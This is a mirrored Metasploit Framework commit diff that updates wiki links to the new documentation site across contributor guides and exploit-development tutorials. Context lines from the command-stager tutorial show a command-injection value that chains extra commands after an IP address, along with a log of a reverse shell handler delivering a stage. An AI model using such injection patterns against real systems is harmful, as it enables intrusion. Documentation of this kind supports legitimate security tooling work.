github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Code Releases Activity

Update all links from Wiki site to new docs site.

Browse Source
This commit is contained in:
Grant Willcox 2022-12-30 12:29:14 -06:00
parent 6111852df8
commit 6043d0ffba
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
114 changed files with 363 additions and 363 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/workflows/labels.yml vendored
View File

@ -59,7 +59,7 @@ jobs:
comment: `
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
- [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
`

10
CONTRIBUTING.md
View File

@ -1,6 +1,6 @@
# Contributing to Metasploit
Thank you for your interest in making Metasploit -- and therefore, the
world -- a better place! Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
world -- a better place! Before you get started, please review our [Code of Conduct](https://docs.metasploit.com/docs/code-of-conduct.html). This helps us ensure our community is positive and supportive for everyone involved.
## Code Free Contributions
Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
will be closed. We need to ensure the code we're adding to master is written to a high standard.
@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
curve, so keep it up!
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@ -101,7 +101,7 @@ curve, so keep it up!
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
[API]:https://rapid7.github.io/metasploit-framework/api
[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[RSpec]:http://rspec.info
[Better Specs]:http://www.betterspecs.org/

4
data/markdown_doc/default_template.erb
View File

@ -15,7 +15,7 @@
<% end %>
## Module Ranking
<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>
**<%= items[:mod_rank_name] %>**
@ -47,7 +47,7 @@
<% end %>
## Module Traits
<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>
<% unless items[:mod_side_effects].empty? %>
### Side Effects

2
data/markdown_doc/payload_demo_template.erb
View File

@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
msf <%= mod.type %>(<%= mod.shortname %>) > generate
```
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).

2
docs/build.rb
View File

@ -187,7 +187,7 @@ module Build
@config.enum_for(:each).map { |page| page }
end
# scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
# scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
def extract_absolute_wiki_links(markdown)
new_links = {}

6
docs/metasploit-framework.wiki/Committer-Keys.md
View File

@ -78,7 +78,7 @@ Please select what kind of key you want:
(4) RSA (sign only)
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
@ -96,7 +96,7 @@ from the Real Name, Comment and Email Address in this form:
Real name: Dade Murphy
Email address: dmurphy@thegibson.example
Comment:
Comment:
You selected this USER-ID:
"Dade Murphy <dmurphy@thegibson.example>"
@ -120,7 +120,7 @@ Enter passphrase: [...]
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
[pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
[con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
[tracking]:https://github.com/keybase/keybase-issues/issues/100

6
docs/metasploit-framework.wiki/Committer-Rights.md
View File

@ -2,7 +2,7 @@
The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) setup guide.
Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:
@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,
Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.
A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
A list of committer public keys [is here](https://docs.metasploit.com/docs/development/maintainers/committer-keys.html).
# How to Gain Commit Rights
@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration
# Useful Links for Committers
* [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
* [http://r-7.co/MSF-DEV](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) is pretty much required reading.
* So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
* Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
* [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.

6
docs/metasploit-framework.wiki/Dot-Net-Deserialization.md
View File

@ -12,7 +12,7 @@ compatibility of each.
| Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter |
| --------------------------- | --------------- | ------------ | ------------- |
| ClaimsPrincipal | Yes | Yes | Yes |
| ClaimsPrincipal | Yes | Yes | Yes |
| TextFormattingRunProperties | Yes | Yes | Yes |
| TypeConfuseDelegate | Yes | Yes | No |
| WindowsIdentity | Yes | Yes | Yes |
@ -134,5 +134,5 @@ payloads such as Meterpreter.
[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html

2
docs/metasploit-framework.wiki/Get-Started-Writing-an-Exploit.md
View File

@ -29,7 +29,7 @@ The Metasploit Framework has seven different rankings to indicate how reliable a
If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html), etc.
But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:

2
docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md
View File

@ -1,6 +1,6 @@
# Intro
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block). Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [here](https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-scan-block). Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
# Hashes

4
docs/metasploit-framework.wiki/Home.md
View File

@ -1,8 +1,8 @@
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.
Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
Are you anxious to get your [Metasploit Development Environment](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
# Getting Started #

10
docs/metasploit-framework.wiki/How-to-Apply-to-GSoC.md
View File

@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g
## Important Dates
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
- Accepted applications announced: May 20th at 1800 UTC
- Programming Starts: June 13th.
@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
# Getting started
Students interesting in GSoC, can start by reading Google's official guides.
Students interesting in GSoC, can start by reading Google's official guides.
<https://developers.google.com/open-source/gsoc/help/student-advice>
Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).
A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution. You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://docs.metasploit.com/docs/development/get-started/contributing-to-metasploit.html#framework-bugs-and-features).
GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I
## Skillz
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What other projects have you worked on before?
## Your project
Fill in the details. What exactly do you want to accomplish?
Fill in the details. What exactly do you want to accomplish?
# Past Submissions
If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.

2
docs/metasploit-framework.wiki/How-to-Use-the-FILEFORMAT-mixin-to-create-a-file-format-exploit.md
View File

@ -38,7 +38,7 @@ register_options(
### Fixed filename
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). Instead, here's how it's done properly:
1 - Deregister the ```FILENAME``` option

2
docs/metasploit-framework.wiki/How-to-get-started-with-writing-a-Meterpreter-script.md
View File

@ -2,4 +2,4 @@
I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.
[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
[You should try writing post modules instead](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html).

4
docs/metasploit-framework.wiki/How-to-send-an-HTTP-request-using-Rex-Proto-Http-Client.md
View File

@ -1,9 +1,9 @@
**Note: This documentation may need to be vetted.**
# How to send an HTTP request using Rex::Proto::Http::Client
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
## Initializing Rex::Proto::Http::Client

2
docs/metasploit-framework.wiki/How-to-use-Msf-Auxiliary-AuthBrute-to-write-a-bruteforcer.md
View File

@ -1,5 +1,5 @@
# How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html) instead. However, some of the datastore options are still needed, so let's go over them right quick.
### Regular options

6
docs/metasploit-framework.wiki/How-to-use-command-stagers.md
View File

@ -158,7 +158,7 @@ Now let's modify the `execute_command` method and get code execution against the
127.0.0.1+%26%26+[Malicious commands]
```
We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
We do that in `execute_command` using [HttpClient](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
```ruby
def filter_bad_chars(cmd)
@ -190,7 +190,7 @@ And let's run that, we should have a shell:
```
msf exploit(cmdstager_demo) > run
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Exploiting...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 10.6.0.92
@ -223,7 +223,7 @@ Available flavors:
The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.
If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html) of the VBS stager, because Powershell tends to be more stealthy.
To use the VBS stager, either specify your CmdStagerFlavor in the metadata:

2
docs/metasploit-framework.wiki/How-to-use-the-Msf-Exploit-Remote-Tcp-mixin.md
View File

@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://docs.metasploit.com/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#changing-the-default-value-for-a-datastore-option)"
## Make a connection

2
docs/metasploit-framework.wiki/How-to-write-a-HTTP-LoginScanner-Module.md
View File

@ -1,6 +1,6 @@
This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.
Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
## Step 1: Set up your target environment

8
docs/metasploit-framework.wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer.md
View File

@ -1,8 +1,8 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:
* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
* **[Msf::Exploit::Remote::HttpServer](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html)** - The most basic form of a HTTP server.
* **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
* **[Msf::Exploit::Remote::BrowserExploitServer](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
### The Automatic Exploitation Procedure
@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
</html>
|
send_exploit_html(cli, html)
end
end
```
[ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
@ -296,7 +296,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
deregister_options('JsObfuscate')
```
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://docs.metasploit.com/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html).
### Related Articles:

4
docs/metasploit-framework.wiki/How-to-write-a-browser-exploit-using-HttpServer.md
View File

@ -1,4 +1,4 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html). This writeup covers the HttpServer mixin.
The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":
@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],

24
docs/metasploit-framework.wiki/Landing-Pull-Requests.md
View File

@ -1,13 +1,13 @@
**This page is meant for Committers. If you are unsure whether you are a committer, you are not.**
